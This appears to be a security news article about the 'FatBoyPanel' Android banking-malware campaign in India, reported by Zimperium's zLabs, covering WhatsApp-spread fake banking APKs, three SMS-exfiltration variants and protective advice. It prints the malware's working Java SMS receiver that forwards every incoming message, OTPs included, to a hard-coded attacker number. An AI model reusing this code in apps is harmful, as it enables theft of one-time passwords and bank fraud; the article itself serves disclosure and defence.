A recent cybersecurity threat has emerged in India, targeting users of various Indian banks with a sophisticated malware campaign.
This campaign, discovered by the zLabs research team, involves nearly 900 malware samples designed to steal sensitive financial and personal data, including Aadhar numbers, PAN cards, ATM PINs, and credit card details.
Besides this, the campaign has been dubbed “FatBoyPanel” by the cybersecurity researchers.
.png
)
While security analysts at Zimperium noted that all the malware samples were designed to deceive Android users and steal their sensitive financial and personal information.
Modus Operandi
The malware is distributed through WhatsApp as APK files masquerading as legitimate government or banking applications.
Once installed, these apps deceive users into disclosing sensitive information by mimicking the user interface of real banking apps.
.webp)
The malware exploits SMS permissions to intercept and exfiltrate messages, including one-time passwords (OTPs), facilitating unauthorized transactions.
This banker malware family has three distinct variants:-
- SMS Forwarding: Captures and forwards stolen SMS messages to an attacker-controlled phone number.
- Firebase-Exfiltration: Exfiltrates stolen SMS messages to a Firebase endpoint, which acts as a command-and-control server.
- Hybrid: Combines both techniques, forwarding stolen SMS messages to a phone number and a Firebase endpoint.
.webp)
A key component of the malware is its ability to intercept SMS messages. Here’s an example of how it captures and forwards SMS messages:-
public class ReceiveSms extends BroadcastReceiver {
String androidID;
private String stringNumber;
public ReceiveSms() {
this.androidID = "'";
this.stringNumber = "+919229736554";
}
@Override // android.content.BroadcastReceiver
public void onReceive(Context context0, Intent intent0) {
this.androidID = Settings.Secure.getString(context0.getContentResolver(), "android_id");
if(intent0.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) {
Bundle bundle0 = intent0.getExtras();
if(bundle0 != null) {
try {
Object[] arr_object = (Object[])bundle0.get("pdus");
SmsMessage[] arr_smsMessage = new SmsMessage[arr_object.length];
for(int v = 0; v < arr_object.length; ++v) {
SmsMessage smsMessage0 = SmsMessage.createFromPdu(((byte[])arr_object[v]));
arr_smsMessage[v] = smsMessage0;
smsMessage0.getOriginatingAddress();
String s = arr_smsMessage[v].getMessageBody();
SmsManager.getDefault().sendTextMessage(this.stringNumber, null, s, null, null);
}
} catch(Exception exception0) {
exception0.printStackTrace();
}
}
}
}
}.webp)
The malware campaign has exposed sensitive data of approximately 50,000 users, including SMS messages from Indian banks, bank details, card details, and government-issued identification details.
Over 1,000 phone numbers used in this campaign have been identified, which will be shared with authorities to track the threat actors.
.webp)
To protect against potential threats, users should verify app authenticity by only downloading banking apps from official app stores.
Make sure to enable multi-factor authentication (MFA) using measures like “OTPs” and “biometric authentication.”
Also remain cautious with links and attachments by avoiding suspicious ones or those from unknown sources.
So, the users must remain vigilant and take proactive steps to safeguard their personal and financial data.
Besides this, it is crucial for both individuals and institutions to stay informed and adapt their security measures accordingly.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
